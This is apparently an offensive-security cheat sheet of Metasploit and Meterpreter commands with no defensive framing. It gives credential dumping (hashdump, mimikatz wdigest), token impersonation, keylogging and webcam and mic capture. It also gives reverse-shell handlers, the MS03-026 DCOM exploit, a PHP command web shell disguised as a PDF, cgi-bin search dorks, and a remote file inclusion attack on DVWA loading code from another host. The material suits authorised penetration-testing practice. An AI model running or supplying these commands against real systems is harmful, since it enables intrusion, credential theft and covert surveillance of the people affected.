[+] Meterpreter Shell

meterpreter > sysinfo

meterpreter > getuid

meterpreter > getsystem

meterpreter > hashdump

meterpreter > load/use mimikatz

kerberos Attempt to retrieve kerberos creds livessp Attempt to retrieve livessp creds mimikatz_command Run a custom commannd msv Attempt to retrieve msv creds (hashes) ssp Attempt to retrieve ssp creds tspkg Attempt to retrieve tspkg creds wdigest Attempt to retrieve wdigest creds

meterpreter > wdigest

meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token SERV-2K3\Administrator execute -f cmd.exe -i -t

Metasploit Exploit Multi Handler

multi/handler to accept an incoming reverse_https_meterpreter

    `payload
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_https
    set LHOST $ip
    set LPORT 443
    exploit
    [*] Started HTTPS reverse handler on https://$ip:443/`

Building Your Own MSF Module

    `mkdir -p ~/.msf4/modules/exploits/linux/misc
    cd ~/.msf4/modules/exploits/linux/misc
    cp
    /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
    ./crossfire.rb
    nano crossfire.rb`

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)

    `download` Download a file or directory
    `upload` Upload a file or directory
    `portfwd` Forward a local port to a remote service
    `route` View and modify the routing table
    `keyscan_start` Start capturing keystrokes
    `keyscan_stop` Stop capturing keystrokes
    `screenshot` Grab a screenshot of the interactive desktop
    `record_mic` Record audio from the default microphone for X seconds
    `webcam_snap` Take a snapshot from the specified webcam
    `getsystem` Attempt to elevate your privilege to that of local system.
    `hashdump` Dumps the contents of the SAM database

search dcom

msf > search dcom
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf > set RHOST 10.0.0.3
msf > show payloads
msf > set PAYLOAD generic/shell_reverse_tcp
msf > set LHOST 10.0.0.6
msf > exploit
sessions –i 1
C: >dir

wc lfi.pdf
 4  4 42 lfi.pdf
 cat lfi.pdf
%PDF-1.4
<?php
  system($_GET["cmd"]);
?>

msfnginx

sitemap.xml filetype:xml intext:"cgi-bin" filetype:sh inurl:cgi-bin filetype:sh intext:cgi-bin intitle:apache "cgi-bin" inurl:cgi-bin inurl:wspd_cgi.sh inurl:wslb.sh inurl:"server-status" intitle:apache "cgi-bin" inurl:cgi-bin "GATEWAY_INTERFACE = CGI" inurl:cgi-bin inurl:printenv intext:SERVER_ADDR

http://172.16.1.102/dvwa/vulnerabilities/fi/?page=http://172.16.1.100/test.php

exploit/linux/http/nginx_chunked_size
auxiliary/scanner/http/wordpress_ghost_scanner
sudo nano /etc/php5/cgi/php.ini
allow_url_fopen and allow_url_include are both set to On. Press Ctrl-X, Y, and Enter
sudo /etc/init.d/apache2 restart
nano /var/www/html/test.php
service apache2 restart
msf exploit(unix/webapp/php_include) > set rhost 172.16.1.102
msf exploit(unix/webapp/php_include) > set headers "Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee"
headers => Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee
msf exploit(unix/webapp/php_include) > set path /dvwa/vulnerabilities/fi/
msf exploit(unix/webapp/php_include) > set phpuri /?page=XXpathXX
msf exploit(unix/webapp/php_include) > set payload php/bind_php
msf exploit(unix/webapp/php_include) > run